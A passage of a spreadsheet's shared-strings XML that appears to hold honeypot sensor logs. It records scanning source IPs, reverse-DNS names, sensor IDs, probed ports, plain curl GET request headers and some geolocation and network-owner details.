    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:c45f</t>
  </si>
  <si>
    <t>b93b70da7c3d79b00c1d638822d045f4</t>
  </si>
  <si>
    <t>125.228.34.140</t>
  </si>
  <si>
    <t>125-228-34-140.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_DNS_H11&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9</t>
  </si>
  <si>
    <t>23&amp;&amp;53&amp;&amp;34903&amp;&amp;80&amp;&amp;35441&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:228c</t>
  </si>
  <si>
    <t>a1d0236ee6bb7631f5ad114029afc1f3</t>
  </si>
  <si>
    <t>117.203.233.118</t>
  </si>
  <si>
    <t>::ffff:75cb:e976</t>
  </si>
  <si>
    <t>5873153afdb0157ac999ad3caeaf5a6a</t>
  </si>
  <si>
    <t>220.133.134.26</t>
  </si>
  <si>
    <t>220-133-134-26.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;60439&amp;&amp;23&amp;&amp;30871&amp;&amp;43718&amp;&amp;9100&amp;&amp;80&amp;&amp;55901&amp;&amp;38183</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:861a</t>
  </si>
  <si>
    <t>a5fecf964e59ad4b2d5060a0bf1e6603</t>
  </si>
  <si>
    <t>114.33.88.168</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-88-168.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;11711&amp;&amp;39760&amp;&amp;39758&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:58a8</t>
  </si>
  <si>
    <t>8fef1c5841991303ae82b2c90df2d755</t>
  </si>
  <si>
    <t>134.236.160.158</t>
  </si>
  <si>
    <t>Lampang</t>
  </si>
  <si>
    <t>Chae Hom</t>
  </si>
  <si>
    <t>1153800</t>
  </si>
  <si>
    <t>18.7127</t>
  </si>
  <si>
    <t>99.5576</t>
  </si>
  <si>
    <t>Cat Bb</t>
  </si>
  <si>
    <t>::ffff:86ec:a09e</t>
  </si>
  <si>
    <t>91ec6ba70c0afa9a867f4a55dd777922</t>
  </si>
  <si>
    <t>59.93.229.183</t>
  </si>
  <si>
    <t>::ffff:3b5d:e5b7</t>
  </si>
  <si>
    <t>45585510fe05eff5f8374da142876edd</t>
  </si>
  <si>
    <t>2.69.68.47</t>
  </si>
  <si>
    <t>2.69.68.47.mobile.tre.se</t>
  </si>
  <si>
    <t>Stockholm (Kungsholmen)</t>
  </si>
  <si>
    <t>104 25</t>
  </si>
  <si>
    <t>59.3351</t>
  </si>
  <si>
    <t>18.0139</t>
  </si>
  <si>
    <t>44034</t>
  </si>
  <si>
    <t>hi3g</t>
  </si>
  <si>
    <t>Hi3G Access AB</t>
  </si>
  <si>
    <t>2006-08-09 00:00:00</t>
  </si>
  <si>
    <t>2025-07-30 00:00:00</t>
  </si>
  <si>
    <t>2024-07-21 00:00:00</t>
  </si>
  <si>
    <t>['ns2.hi3gaccess.se 80.251.192.245', 'ns.hi3gaccess.se 80.251.192.244', 'a.ns.ip-only.net 212.112.160.42']</t>
  </si>
  <si>
    <t>CSC Corp Domains</t>
  </si>
  <si>
    <t>::ffff:245:442f</t>
  </si>
  <si>
    <t>2a0b56a5c861072c7b8f36022ab06e9c</t>
  </si>
  <si>
    <t>125.229.52.69</t>
  </si>
  <si>
    <t>125-229-52-69.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;54256&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de5:3445</t>
  </si>
  <si>
    <t>9d5baca17c6bbc32f32289bb98b6e7fd</t>
  </si>
  <si>
    <t>112.173.65.8</t>
  </si>
  <si>
    <t>::ffff:70ad:4108</t>
  </si>
  <si>
    <t>f8989d3dd0081fc3fd56c05c90cbb623</t>
  </si>
  <si>
    <t>59.127.42.230</t>
  </si>
  <si>
    <t>59-127-42-230.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;43045&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;43352</t>
  </si>
  <si>
    <t>::ffff:3b7f:2ae6</t>
  </si>
  <si>
    <t>1f76f90c8754b45259f8656eb891c3fb</t>
  </si>
  <si>
    <t>176.98.200.30</t>
  </si>
  <si>
    <t>59</t>
  </si>
  <si>
    <t>North Kazakhstan</t>
  </si>
  <si>
    <t>Kyzylzhar District</t>
  </si>
  <si>
    <t>Petropavl</t>
  </si>
  <si>
    <t>1520172</t>
  </si>
  <si>
    <t>54.8732</t>
  </si>
  <si>
    <t>69.1506</t>
  </si>
  <si>
    <t>51997</t>
  </si>
  <si>
    <t>LLP Asket</t>
  </si>
  <si>
    <t>2011-10-17</t>
  </si>
  <si>
    <t>::ffff:b062:c81e</t>
  </si>
  <si>
    <t>24eb557cd769cbfe34abce678f364e22</t>
  </si>
  <si>
    <t>114.33.17.89</t>
  </si>
  <si>
    <t>114-33-17-89.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_DNS_H44&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;53&amp;&amp;23757</t>
  </si>
  <si>
    <t>::ffff:7221:1159</t>
  </si>
  <si>
    <t>985084f2074305ef2c963673b7154e7b</t>
  </si>
  <si>
    <t>122.116.127.90</t>
  </si>
  <si>
    <t>122-116-127-90.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;80&amp;&amp;14174&amp;&amp;42621&amp;&amp;NA&amp;&amp;35379&amp;&amp;35416&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7a74:7f5a</t>
  </si>
  <si>
    <t>49f8f3bf2374fced466691af7ccd3c87</t>
  </si>
  <si>
    <t>104.193.135.102</t>
  </si>
  <si>
    <t>Port Coquitlam</t>
  </si>
  <si>
    <t>6111706</t>
  </si>
  <si>
    <t>V3B</t>
  </si>
  <si>
    <t>49.2574</t>
  </si>
  <si>
    <t>-122.737</t>
  </si>
  <si>
    <t>394256</t>
  </si>
  <si>
    <t>Tech Futures Interactive Inc.</t>
  </si>
  <si>
    <t>Tech Futures Interactive Inc</t>
  </si>
  <si>
    <t>2014-09-19</t>
  </si>
  <si>
    <t>CLOUDSINGULARITY</t>
  </si>
  <si>
    <t>2023-05-08</t>
  </si>
  <si>
    <t>::ffff:68c1:8766</t>
  </si>
  <si>
    <t>d57fc395de4ee8937621969284e3d506</t>
  </si>
  <si>
    <t>182.60.230.212</t>
  </si>
  <si>
    <t>::ffff:b63c:e6d4</t>
  </si>
  <si>
    <t>0956a618332a5c929d88e23d1a122502</t>
  </si>
  <si>
    <t>220.134.29.32</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-29-32.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc86:1d20</t>
  </si>
  <si>
    <t>167d9541a35b88d8efd871546c4f3b35</t>
  </si>
  <si>
    <t>115.245.94.46</t>
  </si>
  <si>
    <t>::ffff:73f5:5e2e</t>
  </si>
  <si>
    <t>893f49998181d83af18eac0a02d39ecd</t>
  </si>
  <si>
    <t>114.33.107.229</t>
  </si>
  <si>
    <t>114-33-107-229.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;32169&amp;&amp;23&amp;&amp;40596&amp;&amp;40692&amp;&amp;9100&amp;&amp;19377</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:6be5</t>
  </si>
  <si>
    <t>40135969770cd0805de8e5940b6f6270</t>
  </si>
  <si>
    <t>182.56.173.108</t>
  </si>
  <si>
    <t>::ffff:b638:ad6c</t>
  </si>
  <si>
    <t>aced6cee14e0ef15e50e0e961f8ad836</t>
  </si>
  <si>
    <t>94.183.4.165</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;14189&amp;&amp;21&amp;&amp;62792&amp;&amp;22&amp;&amp;64194&amp;&amp;23&amp;&amp;41485&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:5eb7:4a5</t>
  </si>
  <si>
    <t>1fb2632a9d848c6adb76a3a154e14115</t>
  </si>
  <si>
    <t>114.33.69.141</t>
  </si>
  <si>
    <t>114-33-69-141.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;25930&amp;&amp;29705&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:458d</t>
  </si>
  <si>
    <t>57caacce2f7b10c556420460d9753efe</t>
  </si>
  <si>
    <t>122.162.144.80</t>
  </si>
  <si>
    <t>Defence Colony</t>
  </si>
  <si>
    <t>10263259</t>
  </si>
  <si>
    <t>28.5714</t>
  </si>
  <si>
    <t>77.2327</t>
  </si>
  <si>
    <t>::ffff:7aa2:9050</t>
  </si>
  <si>
    <t>7708724861e6af0a746c2f514fb60a3e</t>
  </si>
  <si>
    <t>220.132.127.146</t>
  </si>
  <si>
    <t>220-132-127-146.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H27&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;